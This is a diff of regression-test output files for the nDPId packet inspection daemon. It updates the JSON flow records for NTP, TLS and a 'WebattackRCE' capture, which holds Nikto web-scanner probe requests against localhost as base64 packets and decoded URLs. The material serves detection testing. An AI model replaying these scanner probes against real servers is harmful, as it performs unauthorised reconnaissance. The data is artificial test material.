+00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436865396190,"flow_last_seen":1436865396190,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1436865396190,"l3_proto":"ip4","src_ip":"85.22.62.120","dst_ip":"78.46.76.11","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
 00152{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"NTPv4.pcap","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1/1
@@ -12,10 +12,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 157 chars
-~~ json string max len.......: 640 chars
-~~ json string avg len.......: 456 chars
+~~ json string max len.......: 666 chars
+~~ json string avg len.......: 467 chars
diff --git a/test/results/Oscar.pcap.out b/test/results/Oscar.pcap.out
index 261ed0ccb..7bef3164d 100644
--- a/test/results/Oscar.pcap.out
+++ b/test/results/Oscar.pcap.out
@@ -3,9 +3,9 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434606464176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1434606464176,"pkt":"AAxCW5ILDE3pmjdICABFAABAZ9pAAEAGAAAKHh0Dsu0Y+fd9Abu9oGylAAAAALAC\/\/\/zOQAAAgQFtAEDAwUBAQgKFdAS4wAAAAAEAgAA"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1434606464205,"pkt":"DE3pmjdIAAxCW5ILCABFAAAsd\/VAAG8GoM+y7Rj5Ch4dAwG7933\/L+hsvaBspmASQABaVgAAAgQFUAAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434606464205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1434606464205,"pkt":"AAxCW5ILDE3pmjdICABFAAAo27ZAAEAGAAAKHh0Dsu0Y+fd9Abu9oGym\/y\/obVAQ\/\/\/zIQAA"}
-00596{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00597{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00153{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","total-events-serialized":9}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 71/71
@@ -15,10 +15,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4629770 bytes
-~~ total memory freed........: 4629770 bytes
-~~ total allocations/frees...: 99635/99635
+~~ total memory allocated....: 4714723 bytes
+~~ total memory freed........: 4714723 bytes
+~~ total allocations/frees...: 101225/101225
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 158 chars
-~~ json string max len.......: 640 chars
-~~ json string avg len.......: 463 chars
+~~ json string max len.......: 676 chars
+~~ json string avg len.......: 479 chars
diff --git a/test/results/WebattackRCE.pcap.out b/test/results/WebattackRCE.pcap.out
index 4266202e3..2ed39c68f 100644
--- a/test/results/WebattackRCE.pcap.out
+++ b/test/results/WebattackRCE.pcap.out
@@ -1,2395 +1,2395 @@
 00444{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackRCE.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}}
+01039{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}}
+01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"}
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
